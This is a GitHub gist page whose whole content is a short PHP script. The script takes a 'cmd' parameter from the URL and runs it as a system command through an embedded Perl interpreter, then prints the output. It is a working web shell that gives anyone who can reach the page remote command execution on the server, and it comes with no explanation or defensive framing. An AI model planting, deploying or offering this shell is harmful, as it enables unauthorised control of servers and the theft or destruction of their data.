Skip to content

Instantly share code, notes, and snippets.

@haphan
Last active September 4, 2019 09:27
Show Gist options
  • Select an option

  • Save haphan/aab37d5dc326e46f7d53cb9f0075676f to your computer and use it in GitHub Desktop.

Select an option

Save haphan/aab37d5dc326e46f7d53cb9f0075676f to your computer and use it in GitHub Desktop.
<?php
$perl=new perl();
$cmd=$_GET['cmd'];
echo $perl->eval(sprintf("system('%s')", $cmd));
sleep(60);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment